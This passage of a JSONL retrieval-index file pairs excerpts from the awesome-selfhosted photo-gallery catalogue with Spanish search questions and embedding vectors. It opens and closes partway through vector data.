-0.04554, -0.05922, 0.02207, 0.00196, -0.04946, -0.03902, 0.0579, 0.01842, 0.0604, 0.0484, -0.04291, -0.03595, 0.10226, -0.05172, -0.00208, -0.02207, -0.09081, -0.01472, -0.04272, 0.04722, -0.10818, -0.00974, -0.02758, 0.02977, 0.0292, -0.15166, -0.01385, -0.00042, 0.00156, 0.01809, -0.06806, -0.0172, 0.03027, 0.03121, -0.01757, -0.01632, 0.04046, 0.01366, -0.08139, 0.02159, 0.05335, -0.12288, 0.00519, -0.05045, -0.0281, -0.05265, 0.09226, -0.09566, -0.08221, 0.02135, -0.01475, -0.02038, -0.00771, 0.01956, 0.00719, -0.05091, -0.04057, 0.07329, 0.02116, 0.03901, 0.01822, 0.03525, 0.03917, -0.04554, -0.04162, 0.00717, -0.02898, -0.00943, -0.05502, -0.07027, -0.10637, -0.03457, 0.04673, 0.01809, -0.11877, 0.05856, 0.01189, -0.02649, 0.01215, -0.00047, 0.00863, -0.01104, -0.01871, -0.05167, 0.09477, -0.00041, -0.00256, -0.01136, -0.00223, 0.05065, 0.07961, -0.05561, -0.00284, 0.07492, 0.08898, -0.00923, 0.02082, 0.03717, -0.04899, 0.016, -0.04796, -0.04255, 0.04747, 0.0265, 0.00043, -0.05223, -0.06579, -0.07107, 0.00766, 0.06649, -0.0132, -0.00245, -0.01156, -0.05378, -0.05488, 0.07886, 0.01023, -0.13786, -0.05641, 0.03091, 0.10956, -0.00501, 0.09034, -0.0527]} +{"tipo": "pregunta", "herramienta": "Photo Galleries", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Photo Galleries", "tema": "photo galleries", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Photo Galleries: Chevereto β€” Ultimate image sharing software. Create your very own personal image hosting website in just minutes [AGPL-3.0, PHP/Docker]. ChronoFrame β€” Personal gallery application with online photo management, supporting Live/Motion Photos, and explore map [MIT, Nodejs/Docker]. Damselfly β€” Fast server-based photo management system for large collections of images. Includes face detection, face & object recognition, powerful search, and EXIF Keyword tagging. Runs on Linux, MacOS and Windows [GPL-3.0, Docker/C#/.NET]. Ente β€” An end-to-end encrypted photo-sharing platform (alternative to Google Photos, Apple Photos) [AGPL-3.0, Docker/Nodejs/Go]. HomeGallery β€” Browse personal photos and videos featuring tagging, mobile-friendly, and AI powered image discovery [MIT, Nodejs/Docker]. Immich Kiosk β€” Lightweight slideshow for running on kiosk devices and browsers that uses Immich as a data source [GPL-3.0, Docker/Go]. Immich β€” Photo and video backup solution directly from your mobile phone (alternative to Google Photos) [AGPL-3.0, Docker].", "indexar": "que programa puedo usar para crear una pΓ‘gina web personal de mis fotos y videos?", "v": [-0.02583, 0.13959, -0.07636, -0.18584, -0.02008, -0.14223, -0.04507, -0.05852, -0.02858, -0.16378, -0.08107, -0.15592, -0.07143, -0.0647, -0.05666, -0.06506, 0.12809, -0.06769, 0.15455, 0.02212, -0.01081, 0.04051, -0.07823, -0.07568, -0.07109, -0.03114, 0.07337, -0.05103, -0.09237, 0.02865, 0.00048, 0.031, -0.0159, 0.00131, -0.03088, -0.05366, 0.13474, -0.00172, -0.02449, 0.09431, -0.00919, -0.02054, -0.06169, 0.12587, 0.03143, 0.0748, 0.05085, -0.10106, -0.0992, 0.03053, 0.05279, 0.01433, -0.11528, 0.0617, 0.00727, -0.15909, 0.11026, -0.20036, -0.03458, 0.04705, 0.01453, 0.09799, -0.02935, 0.0065, -0.01443, -0.02568, 0.00574, 0.00016, -0.05249, 0.05201, -0.00403, -0.02866, 0.06356, -0.06453, 0.07155, -0.01441, -0.04985, -0.02381, -0.02559, -0.03118, -0.09793, -0.00159, -0.03677, 0.03144, -0.1944, -0.00352, 0.0369, 0.03017, 0.02986, -0.14122, 0.06142, 0.05774, 0.00633, -0.07173, -0.00309, -0.07473, 0.08564, 0.09272, 0.06528, -0.04079, -0.01405, -0.06987, -0.01404, 0.04495, -0.0088, 0.02975, 0.14632, -0.02276, -0.10801, -0.0313, 0.03337, -0.04395, -0.11267, -0.06592, -0.09901, 0.04911, -0.06944, -0.00513, 0.03237, -0.08312, -0.03022, -0.04127, -0.05712, -0.06852, 0.06359, 0.07729, -0.0714, 0.06343, -0.15167, 0.10055, -0.04877, -0.00483, -0.05192, -0.04944, 0.06808, -0.03919, -0.0074, -0.02491, 0.00765, -0.06022, -0.01208, -0.01379, -0.05589, -0.06915, -0.02052, -0.00866, -0.06332, -0.0796, -0.11195, 0.07228, 0.01078, 0.03469, -0.01462, 0.00262, -0.09853, 0.00541, 0.02362, -0.05199, -0.04583, -0.02647, -0.09807, 0.07066, 0.04197, 0.02725, 0.01846, -0.03899, -0.09754, 0.02256, 0.01772, 0.0636, -0.0091, 0.08552, 0.013, -0.11018, 0.05931, 0.01194, -0.04053, -0.07915, 0.01097, -0.00612, -0.04554, 0.00019, 0.04531, 0.05149, 0.0161, -0.02953, 0.02236, 0.05892, -0.06292, 0.00815, -0.05423, -0.0015, -0.02707, 0.04968, 0.03724, -0.00855, -0.05017, 0.00794, 0.0701, -0.04463, -0.01048, -0.0564, -0.01449, 0.00535, -0.00869, -0.0067, -0.02768, -0.02607, 0.04934, 0.0156, 0.0125, -0.05583, 0.05986, -0.04429, -0.05011, 0.00234, 0.09247, 0.02051, -0.00039, -0.02319, 0.06905, 0.05062, -0.01577, 0.08562, 0.05132, 0.0334, 0.01261, -0.01986, -0.02498, -0.00168, -0.04658, -0.02412, -0.03669, -0.10727, 0.0391, -0.00846, -0.00763, 0.02264, -0.06559, -0.07011, -0.00956, 0.07563, -0.0378, -0.0019, -0.03238, -0.03662, -0.07726, 0.01754, 0.02022, -0.07196, -0.00714, -0.00109, 0.04498, -0.03017, -0.00452, 0.04651]} +{"tipo": "pregunta", "herramienta": "Photo Galleries", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Photo Galleries", "tema": "photo galleries", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Photo Galleries: Chevereto β€” Ultimate image sharing software. Create your very own personal image hosting website in just minutes [AGPL-3.0, PHP/Docker]. ChronoFrame β€” Personal gallery application with online photo management, supporting Live/Motion Photos, and explore map [MIT, Nodejs/Docker]. Damselfly β€” Fast server-based photo management system for large collections of images. Includes face detection, face & object recognition, powerful search, and EXIF Keyword tagging. Runs on Linux, MacOS and Windows [GPL-3.0, Docker/C#/.NET]. Ente β€” An end-to-end encrypted photo-sharing platform (alternative to Google Photos, Apple Photos) [AGPL-3.0, Docker/Nodejs/Go]. HomeGallery β€” Browse personal photos and videos featuring tagging, mobile-friendly, and AI powered image discovery [MIT, Nodejs/Docker]. Immich Kiosk β€” Lightweight slideshow for running on kiosk devices and browsers that uses Immich as a data source [GPL-3.0, Docker/Go]. Immich β€” Photo and video backup solution directly from your mobile phone (alternative to Google Photos) [AGPL-3.0, Docker].", "indexar": "cual es una alternativa libre a Google Photos que funcione en mi propio servidor?", "v": [-0.04901, 0.10709, -0.15568, -0.06012, -0.10663, -0.15436, 0.00523, -0.12992, -0.08693, -0.09216, -0.03723, -0.1108, 0.00831, 0.00499, 0.1299, -0.06106, 0.18796, -0.16077, 0.08102, 0.01764, -0.1254, 0.04843, 0.0004, -0.14442, -0.0625, -0.03508, 0.03516, -0.0349, -0.08748, -0.00877, 0.07026, -0.03074, 0.02146, -0.05832, -0.06266, -0.08381, 0.04894, 0.08985, 0.0179, -0.05294, 0.04196, -0.08023, -0.11604, 0.12893, -0.11129, -0.08186, 0.07876, -0.09342, 0.00018, 0.01808, -0.07984, -0.08614, -0.10084, 0.03334, 0.01402, 0.05574, 0.14364, -0.16961, 0.00818, 0.02876, -0.13678, 0.00691, 0.02517, -0.00917, 0.09397, 0.05519, 0.03346, 0.01065, -0.08024, 0.01907, -0.06302, 0.05365, -0.0321, -0.07638, 0.03192, 0.12179, -0.02018, -0.02892, -0.02931, 0.07218, 0.08543, -0.0618, -0.07255, 0.09113, -0.1207, -0.13235, 0.02415, -0.11217, 0.03843, 0.02206, 0.05654, 0.06045, -0.05085, 0.14165, 0.00832, -0.02079, 0.11642, -0.00461, 0.05128, 0.01471, 0.16944, 0.05344, -0.0672, -0.02115, -0.00933, 0.03103, 0.09039, -0.03638, -0.04915, -0.03395, 0.0181, -0.04413, -0.03212, 0.00074, -0.04093, -0.02424, -0.05316, 0.01609, -0.01163, 0.03744, -0.08765, -0.05725, -0.02158, -0.0338, 0.01186, 0.03265, 0.01035, 0.02267, -0.02973, -0.02591, 0.02743, -0.00353, -0.0408, -0.06981, -0.05415, 0.10486, 0.06665, -0.04783, -0.02531, -0.03499, 0.00787, -0.0025, 0.04124, -0.08584, 0.0631, 0.01144, 0.0696, -0.05266, -0.08923, -0.01799, -0.04609, -0.01184, -0.02565, 0.09608, -0.08468, 0.03091, -0.07616, -0.09797, -0.03039, 0.05606, 0.00029, -0.01157, 0.08713, 0.09098, -0.03728, 0.01816, -0.01214, -0.00955, -0.046, 0.0218, -0.06519, 0.03738, 0.00246, -0.07829, 0.06149, -0.01115, -0.03746, -0.05465, 0.08568, 0.03702, -0.02205, 0.05855, -0.03879, -0.01449, -0.02644, -0.04042, -0.03377, 0.00343, 0.00167, 0.02318, 0.00361, -0.0133, -0.04582, 0.00959, 0.02699, -0.0342, -0.05699, -0.09407, 0.0053, -0.02909, -0.05185, -0.04419, 0.00456, -0.00436, -0.02653, -0.05886, 0.02661, 0.05768, 0.02431, 0.01009, -0.00536, 0.00313, 0.11938, -0.02199, -0.03389, 0.01822, 0.08123, -0.07574, 0.00068, -0.05975, 0.06508, 0.02532, 0.01885, 0.01909, 0.01196, 0.05071, 0.03455, 0.00581, 0.00499, -0.03072, 0.00678, 0.03731, -0.06493, -0.0427, 0.03411, -0.00933, 0.01898, -0.0034, -0.01641, -0.07632, 0.07608, 0.06559, -0.03895, -0.05355, -0.02525, -0.04856, -0.05689, -0.02403, -0.0284, -0.05905, -0.02406, 0.02014, 0.02929, -0.02356, 0.0219, -0.04061]} +{"tipo": "pregunta", "herramienta": "Photo Galleries", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Photo Galleries", "tema": "photo galleries", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Photo Galleries: Chevereto β€” Ultimate image sharing software. Create your very own personal image hosting website in just minutes [AGPL-3.0, PHP/Docker]. ChronoFrame β€” Personal gallery application with online photo management, supporting Live/Motion Photos, and explore map [MIT, Nodejs/Docker]. Damselfly β€” Fast server-based photo management system for large collections of images. Includes face detection, face & object recognition, powerful search, and EXIF Keyword tagging. Runs on Linux, MacOS and Windows [GPL-3.0, Docker/C#/.NET]. Ente β€” An end-to-end encrypted photo-sharing platform (alternative to Google Photos, Apple Photos) [AGPL-3.0, Docker/Nodejs/Go]. HomeGallery β€” Browse personal photos and videos featuring tagging, mobile-friendly, and AI powered image discovery [MIT, Nodejs/Docker]. Immich Kiosk β€” Lightweight slideshow for running on kiosk devices and browsers that uses Immich as a data source [GPL-3.0, Docker/Go]. Immich β€” Photo and video backup solution directly from your mobile phone (alternative to Google Photos) [AGPL-3.0, Docker].", "indexar": "con quΓ© herramienta puedo gestionar y organizar grandes colecciones de imΓ‘genes con reconocimiento facial?", "v": [0.13928, 0.18598, -0.15684, -0.19914, -0.00195, -0.1188, 0.03772, 0.05394, -0.11285, -0.15855, -0.08869, -0.08393, -0.07425, -0.06419, 0.09778, 0.05697, 0.09521, -0.15521, -0.10479, 0.08389, -0.00756, 0.09066, -0.03854, -0.05185, 0.03353, -0.08203, 0.12554, -0.05752, -0.02035, 0.10933, 0.03444, 0.00556, 0.02169, -0.10073, -0.03095, -0.04952, -0.03162, -0.01356, -0.1213, -0.0403, -0.1256, 0.0008, -0.08366, 0.0621, 0.07691, 0.00251, -0.05941, 0.03237, -0.01523, 0.00895, -0.04956, -0.01871, -0.07928, 0.09477, 0.04512, -0.18432, 0.04905, 0.02586, 0.04986, 0.015, -0.05309, 0.08913, -0.0063, 0.06743, 0.04316, 0.02698, -0.05863, -0.04834, -0.06781, 0.00334, -0.07623, -0.02363, 0.03665, -0.02253, 0.10269, 0.05404, 0.00766, 0.05922, -0.01598, -0.06854, 0.03253, 0.00023, -0.10115, -0.0088, -0.03207, -0.09073, 0.01414, -0.02656, 0.03436, -0.12772, -0.04779, -0.05487, -0.01515, -0.10228, -0.00763, 0.0641, 0.02254, -0.01616, 0.0392, 0.01935, 0.03319, -0.05364, -0.11232, 0.03921, -0.03641, 0.0704, 0.06497, -0.07367, -0.01643, -0.09626, -0.03563, 0.01038, -0.06228, -0.01986, -0.08728, 0.02303, -0.01372, -0.06866, 0.03458, 0.01299, -0.01168, -0.02922, 0.03177, 0.00655, 0.06617, -0.03465, -0.04117, 0.11136, -0.02351, -0.05882, -0.10403, 0.01491, -0.05231, -0.04062, -0.04389, -0.01515, -0.04941, -0.07523, 0.02136, -0.17573, -0.08937, 0.07898, -0.00377, -0.06629, 0.08081, -0.00769, 0.04185, -0.04475, -0.02824, 0.0451, 0.04611, -0.05456, 0.08435, 0.01004, 0.06727, 0.11148, -0.05212, -0.0553, 0.00137, -0.0307, -0.12223, 0.01694, 0.05685, 0.05279, 0.00036, -0.05661, -0.00215, 0.00777, 0.06422, 0.02535, 0.08, 0.00467, -0.07073, -0.02533, 0.01105, -0.02356, -0.06337, -0.10566, 0.10625, -0.02391, -0.02781, 0.047, 0.00173, -0.03858, 0.00357, -0.03935, -0.03287, 0.04659, 0.01279, 0.01008, -0.0109, 0.08902, 0.0221, -0.03188, 0.08603, -0.02208, -0.01777, 0.00898, 0.03678, 0.04625, -0.05443, -0.03595, -0.01141, -0.03385, -0.01266, 0.05904, -0.10043, 0.10613, 0.03211, 0.01049, 0.03635, 0.00946, 0.04568, -0.05884, -0.0651, 0.00562, -0.02355, 0.01815, -0.05168, -0.00744, 0.01569, 0.03509, 0.05623, 0.0094, 0.01686, -0.01265, -0.00372, 0.04407, 0.09709, 0.02506, 0.00892, 0.04887, -0.0449, -0.04543, 0.03937, -0.03558, 0.06116, -0.01706, -0.03251, -0.01342, 0.03941, 0.0542, -0.00089, 0.01894, -0.07748, -0.07825, -0.04037, 0.037, -0.00144, -0.09105, 0.0195, 0.04993, 0.07045, -0.05338, 0.01741, -0.05463]} +{"tipo": "pregunta", "herramienta": "Photo Galleries", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Photo Galleries", "tema": "photo galleries", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Photo Galleries: LibrePhotos β€” Photo management service with a slight focus on cool graphs (alternative to Google Photos) [MIT, Python/Docker]. Lychee β€” Grid and album based photo-management-system [MIT, PHP/Docker]. Mediagoblin β€” Media publishing platform that anyone can run (alternative to Flickr, YouTube, SoundCloud) [AGPL-3.0, Python]. Memtly β€” Event photo sharing platform and gallery with slideshow that allows guests to view and share memories via a QR code [GPL-3.0, C#/Docker]. Nextcloud Memories β€” Fast, modern and advanced photo management suite. Runs as a Nextcloud app [AGPL-3.0, PHP]. Photofield β€” Experimental fast photo viewer [MIT, Docker/Go]. PhotoPrism β€” Personal photo management powered by Go and Google TensorFlow. Browse, organize, and share your personal photo collection, using the latest technologies to automatically tag and find pictures [AGPL-3.0, Go/Docker].", "indexar": "que programa puedo usar para gestionar mis fotos como alternativa a Google Photos?", "v": [-0.02064, 0.10495, -0.07474, -0.21308, -0.09371, -0.08114, -0.05359, -0.04252, -0.13633, -0.11056, -0.05461, -0.12317, -0.04599, 0.04679, 0.04199, -0.09193, 0.10297, -0.08988, 0.05693, -0.0126, -0.08172, 0.09111, -0.02915, -0.18005, -0.02667, 0.02772, -0.00366, -0.07203, -0.00459, -0.00846, 0.01147, -0.04158, -0.01133, -0.08618, -0.16644, -0.0063, 0.10275, -0.06394, 0.07711, -0.04383, -0.07162, -0.04333, -0.07675, 0.09736, -0.02048, -0.05552, 0.05492, -0.08512, -0.11788, -0.05433, -0.00688, -0.0284, -0.08014, 0.06674, 0.0904, -0.07289, 0.06677, -0.1536, -0.14775, 0.02216, 0.00885, 0.08265, -0.02619, 0.11893, 0.06324, 0.0945, 0.10373, 0.06263, -0.1469, 0.07895, 0.02075, 0.08649, 0.06624, -0.05153, 0.01793, 0.01539, 0.02116, -0.00833, -0.04686, 0.00087, -0.02488, -0.02081, -0.03481, 0.07057, -0.16717, -0.11911, 0.03072, -0.05819, -0.03221, -0.07772, -0.02613, -0.00947, 0.03471, -0.02609, 0.06088, 0.01638, 0.08394, 0.00605, 0.0474, 0.01426, 0.09855, -0.01824, -0.04978, 0.02789, -0.09081, -0.00048, 0.09794, -0.05674, -0.134, -0.07394, -0.05915, -0.05291, -0.05488, -0.00865, -0.04319, 0.07116, 0.00951, -0.02164, -0.03742, -0.06266, -0.05942, -0.03989, -0.02835, -0.03569, 0.14675, 0.06781, -0.03027, 0.0662, -0.10075, 0.06552, -0.08193, -0.00509, 0.03647, -0.04643, -0.06398, 0.03742, 0.01195, -0.04194, 0.02391, -0.06594, -0.0982, 0.01187, 0.03078, -0.12516, 0.00133, 0.00079, -0.03995, -0.04794, -0.01028, -0.0024, 0.03295, 0.00392, 0.00461, 0.10752, -0.04676, 0.04644, -0.05245, -0.06226, -0.08124, -0.01034, -0.14237, -0.06034, 0.06915, 0.08146, -0.00958, -0.03135, 0.00735, -0.04202, -0.07514, 0.04698, 0.00449, 0.07834, 0.03591, -0.02296, 0.08451, 0.02887, 0.04442, -0.09503, 0.04987, 0.06297, -0.04909, 0.03636, 0.04285, 0.04806, 0.06442, 0.01683, -0.06099, 0.1007, -0.05804, -0.00912, -0.04199, 0.00644, 0.05652, 0.004, 0.07029, -0.01324, -0.03618, 0.01039, 0.04138, -0.01831, -0.02446, -0.0207, 0.02664, 0.02916, 0.01235, -0.03497, 0.0129, 0.08147, 0.07655, -0.00142, -0.04038, -0.00831, 0.05855, 0.00361, -0.0504, -0.01064, 0.0164, 0.02639, 0.01573, -0.05241, 0.02598, 0.02564, -0.00829, 0.11872, 0.01479, -0.00836, -0.00579, -0.00953, -0.04697, -0.03708, 0.03953, 0.0422, -0.04001, -0.00417, 0.01822, -0.04077, -0.02349, -0.02894, 0.00766, -0.05412, 0.00349, 0.01752, -0.01354, 0.02792, -0.06879, 0.02258, -0.07041, 0.02212, 0.02596, -0.02026, 0.017, 0.04709, 0.03568, -0.01699, 0.01712, 0.02604]} +{"tipo": "pregunta", "herramienta": "Photo Galleries", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Photo Galleries", "tema": "photo galleries", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Photo Galleries: LibrePhotos β€” Photo management service with a slight focus on cool graphs (alternative to Google Photos) [MIT, Python/Docker]. Lychee β€” Grid and album based photo-management-system [MIT, PHP/Docker]. Mediagoblin β€” Media publishing platform that anyone can run (alternative to Flickr, YouTube, SoundCloud) [AGPL-3.0, Python]. Memtly β€” Event photo sharing platform and gallery with slideshow that allows guests to view and share memories via a QR code [GPL-3.0, C#/Docker]. Nextcloud Memories β€” Fast, modern and advanced photo management suite. Runs as a Nextcloud app [AGPL-3.0, PHP]. Photofield β€” Experimental fast photo viewer [MIT, Docker/Go]. PhotoPrism β€” Personal photo management powered by Go and Google TensorFlow. Browse, organize, and share your personal photo collection, using the latest technologies to automatically tag and find pictures [AGPL-3.0, Go/Docker].", "indexar": "cual es una herramienta de gestiΓ³n de imΓ‘genes que funcione sin internet y se autoetiquete?", "v": [-0.05733, 0.09266, -0.09515, -0.09936, 0.07284, -0.16056, -0.14578, -0.07933, -0.05196, -0.03582, -0.01365, -0.1455, -0.03633, -0.01614, 0.14972, 0.00484, 0.05879, -0.18289, 0.03769, -0.06197, -0.06656, 0.07347, -0.02866, 0.00465, -0.13252, -0.01229, 0.05073, -0.02793, -0.19225, 0.02573, 0.03274, 0.02516, 0.1424, -0.06091, -0.06592, -0.16085, -0.00867, 0.10013, 0.04627, 0.05404, 0.01712, -0.03506, -0.15206, 0.09571, 0.01009, 0.02102, 0.01172, -0.05776, 0.08569, 0.06766, -0.05203, -0.10738, -0.07475, 0.01749, 0.01261, -0.12017, 0.20396, -0.10128, 0.0944, -0.04671, -0.05283, 0.05695, -0.02029, -0.01575, -0.03231, 0.0629, 0.1064, -0.07017, -0.10095, 0.09288, 0.08473, 0.0802, 0.0386, -0.01387, 0.07626, -0.01148, -0.02436, 0.08461, -0.09635, -0.04815, 0.09789, -0.01123, -0.07995, 0.01114, -0.13178, -0.08096, 0.03851, -0.07593, -0.00178, -0.04505, -0.02777, 0.01711, 0.00167, -0.00318, -0.02727, 0.03396, 0.03598, -0.08722, 0.04831, -0.05635, 0.11745, 0.00625, -0.16554, 0.06141, -0.00605, 0.02601, 0.07345, -0.06545, -0.06795, -0.04761, 0.08301, -0.01149, -0.02162, -0.05103, -0.05379, 0.01563, 0.01503, -0.05837, -0.03533, -0.09116, -0.02784, 0.04649, 0.01113, -0.05258, 0.05388, 0.05594, 0.00944, 0.09136, -0.05719, -0.06219, 0.00436, -0.05005, -0.08007, -0.10027, -0.05701, 0.00922, 0.00416, -0.05864, -0.03244, -0.08983, -0.00238, 0.00131, -0.03113, -0.06713, 0.03079, -0.00083, 0.02837, -0.00714, -0.09249, 0.04393, -0.028, -0.01371, 0.02311, 0.00982, 8e-05, 0.11646, -0.08645, -0.00087, -0.02607, -0.04462, -0.08625, -0.05255, 0.1204, 0.07797, -0.0651, 0.01803, -0.07928, 0.04312, -0.00802, -0.01799, 0.02735, 0.00267, -0.04898, -0.02166, 0.00191, -0.02911, -0.06159, -0.04091, 0.01891, -0.00911, -0.05336, -0.00494, -0.01925, 0.04027, 0.00322, 0.02448, -0.02324, -0.02904, -0.09836, -0.01881, 0.01795, -0.03051, -0.02237, 0.0203, 0.07573, 0.00655, -0.06592, -0.02463, 0.07149, 0.00046, -0.07524, -0.07786, -0.02664, -0.02564, -0.03753, 0.00804, 0.02684, -0.00315, -0.01963, 0.0325, -0.00676, 0.00785, 0.02594, -0.09406, -0.00129, -0.02166, 0.02935, -0.03013, -0.08666, -0.01963, 0.04973, -0.01313, 0.01978, 0.04027, 0.00842, 0.08454, -0.00102, 0.01763, 0.00231, -0.05541, -0.00815, -0.01038, -0.04306, -0.03681, -0.00647, -0.0348, 0.0328, -0.04345, -0.06978, -0.0442, 0.00477, 0.07191, 0.03894, -0.00985, -0.01207, -0.06905, -0.04088, -0.0457, 0.03131, -0.09296, -0.00065, 0.00727, -0.00042, -0.01283, 0.04615, -0.01073]} +{"tipo": "pregunta", "herramienta": "Photo Galleries", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Photo Galleries", "tema": "photo galleries", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Photo Galleries: LibrePhotos β€” Photo management service with a slight focus on cool graphs (alternative to Google Photos) [MIT, Python/Docker]. Lychee β€” Grid and album based photo-management-system [MIT, PHP/Docker]. Mediagoblin β€” Media publishing platform that anyone can run (alternative to Flickr, YouTube, SoundCloud) [AGPL-3.0, Python]. Memtly β€” Event photo sharing platform and gallery with slideshow that allows guests to view and share memories via a QR code [GPL-3.0, C#/Docker]. Nextcloud Memories β€” Fast, modern and advanced photo management suite. Runs as a Nextcloud app [AGPL-3.0, PHP]. Photofield β€” Experimental fast photo viewer [MIT, Docker/Go]. PhotoPrism β€” Personal photo management powered by Go and Google TensorFlow. Browse, organize, and share your personal photo collection, using the latest technologies to automatically tag and find pictures [AGPL-3.0, Go/Docker].", "indexar": "busco un servicio propio para compartir recuerdos de eventos con cΓ³digo QR, ΒΏhay alguna opciΓ³n?", "v": [0.04868, 0.07722, -0.13854, -0.0867, -0.12075, -0.2641, 0.03988, 0.09634, -0.00708, -0.27893, -0.13918, -0.08658, 0.0205, -0.01645, 0.00205, -0.05163, 0.18007, 0.10077, 0.11519, 0.02593, -0.01536, 0.06228, -0.09646, 0.05577, -0.04393, -0.10776, -0.0154, -0.00744, -0.0964, 0.02252, 0.09499, -0.00267, 0.07765, 0.0235, -0.04333, 0.0212, 0.17194, 0.22426, -0.01439, -0.03814, -0.00256, -0.00638, 0.03641, 0.10875, 0.06587, -0.07818, -0.07701, 0.05439, -0.0075, -0.07831, 0.00706, -0.05817, -0.14569, -0.01663, -0.01074, 0.00765, 0.01647, -0.07456, -0.03655, 0.03185, 0.05322, -0.08662, -0.00441, 0.00013, 0.05775, -0.0402, 0.00413, 0.08029, -0.04406, 0.05224, -0.1982, 0.08189, 0.01918, -0.05725, 0.06662, 0.07817, 0.03165, -0.07824, 0.00262, 0.1418, -0.03112, -0.0447, 0.00187, 0.01586, 0.00925, 0.05261, 0.0225, -0.05058, 0.0417, -0.09491, 0.10916, 0.05494, 0.0044, 0.05317, -0.09292, 0.00592, 0.03985, 0.08951, 0.02146, 0.06481, 0.12931, -0.05099, 0.01702, 0.04002, 0.08152, 0.01515, 0.01512, -0.00923, 0.07589, -0.02386, -0.01177, -0.04578, -0.02053, 0.01775, -0.09335, 0.05422, 0.02158, -0.10181, 0.04736, 0.02329, -0.05687, -0.01212, 0.07132, 0.00483, -0.00877, 0.0856, -0.01457, 0.11443, -0.04548, -0.00071, -0.05392, 0.04924, -0.0174, -0.03461, 0.06921, 0.02867, 0.08338, 0.07681, 0.10684, -0.02296, 0.0062, -0.01483, -0.02815, 0.06701, 0.01952, 0.0882, 0.02807, 0.0066, -0.01349, 0.05532, -0.05144, 0.03598, -0.06444, 0.04101, -0.04902, -0.02855, -0.00244, -0.12962, -0.0066, 0.02428, -0.10942, 0.02578, 0.00371, -0.01661, -0.01953, -0.02065, -0.01693, -0.04354, 0.04483, 0.00358, -0.05673, -0.03293, 0.0023, -0.08001, -0.00022, -0.05392, -0.01933, -0.02, -0.00693, -0.02341, -0.03767, 0.01836, 0.04842, 0.01639, 0.0469, -0.08547, 0.03456, 0.04199, 0.01484, -0.06367, 0.03617, -0.04045, 0.00225, -0.01258, -0.00135, 0.0143, -0.00609, -0.02351, -0.02615, -0.02518, -0.0651, 0.05389, 0.045, 0.01533, 0.03059, 0.01177, -0.03403, 0.05671, -0.0248, 0.02944, -0.01056, -0.00118, 0.08446, -0.04169, -0.06763, 0.04336, 0.01099, 0.00908, 0.08127, -0.02852, -0.00087, -0.03028, 0.00125, 0.02417, 0.02968, -0.02321, 0.07173, 0.03065, 0.01402, -0.00699, -0.00163, 0.02528, -0.01726, 0.0293, 0.09277, 0.02505, 0.00588, -0.0088, -0.03593, -0.03675, 0.01308, 0.01623, -0.06346, -0.01364, -0.00767, -0.01096, -0.05792, 0.02845, -0.04418, -0.04395, 0.0271, -0.05079, 0.03665, -0.00647, -0.00237, -0.01069]} +{"tipo": "pregunta", "herramienta": "Photo Galleries", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Photo Galleries", "tema": "photo galleries", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Photo Galleries: Photoview β€” Simple and user-friendly photo gallery for personal servers. It is made for photographers and aims to provide an easy and fast way to navigate directories, with thousands of high resolution photos [GPL-3.0, Go/Docker]. PiGallery 2 β€” Directory-first photo gallery website, with a rich UI, optimised for running on low resource servers [MIT, Docker/Nodejs]. Piwigo β€” Photo gallery software for the web, built by an active community of users and developers [GPL-2.0, PHP]. sigal β€” Yet another simple static gallery generator [MIT, Python]. SPIS β€” A simple, lightweight and fast media server with decent mobile support [GPL-3.0, Docker/Rust]. This week in past β€” Aggregates images taken this week, from previous years and presents them on a web page with a simple slideshow [MIT, Docker/Rust]. Thumbor β€” A smart imaging service and enables on-demand cropping, resizing, applying filters and optimizing images [MIT, Python/Docker]. Zenphoto β€” Open-source gallery and CMS project [GPL-2.0, PHP].", "indexar": "que programa hay para montar una galerΓ­a de fotos sencilla en mi servidor personal?", "v": [0.02756, 0.04458, -0.15183, -0.20581, -0.21608, -0.17531, -0.02203, -0.06498, -0.0503, -0.10062, -0.01433, -0.01878, 0.06794, -0.06702, 0.07376, 0.00951, 0.1411, -0.11738, 0.12889, 0.11201, -0.05262, 0.16926, 0.01804, -0.1022, -0.05509, -0.00508, 0.11101, -0.07706, -0.08516, -0.00668, 0.09256, -0.02428, 0.01627, -0.02559, 0.00642, -0.16559, 0.07797, -0.03745, -0.05067, -0.03709, 0.03388, -0.07588, 0.03696, 0.09813, -0.02211, -0.03944, 0.11179, -0.09659, -0.02397, 0.02972, 0.0499, 0.00815, -0.00092, 0.04776, -0.00978, -0.12047, 0.00875, -0.09847, 0.00043, 0.04142, -0.02493, 0.14184, -0.05755, 0.0371, 0.07684, 0.03275, 0.03317, -0.02803, -0.10698, -0.05191, -0.01858, -0.03466, 0.03381, -0.0558, -0.0406, 0.01795, -0.00525, -0.1024, -0.00226, 0.04276, -0.07548, 0.02475, -0.0055, 0.18072, -0.14785, -0.00766, 0.00116, -0.02362, 0.0557, 0.05381, 0.06292, 0.06919, -0.04342, 0.04406, 0.0527, -0.07775, 0.18094, 0.12927, 0.03034, 0.02229, 0.03837, -0.00794, -0.00698, 0.06665, -0.03501, 0.04439, 0.15745, -0.05607, -0.06832, -0.0338, 0.06705, -0.01899, -0.03737, 0.02158, -0.11786, -0.08779, -0.00819, 0.00654, 0.00307, 0.01024, -0.08871, 0.04106, 0.02944, -0.01189, 0.05571, -0.0179, 0.00127, 0.08504, -0.0862, 0.01241, -0.04911, 0.01465, -0.04774, -0.01098, -0.01341, -0.00022, 0.02742, -0.09399, -0.04088, 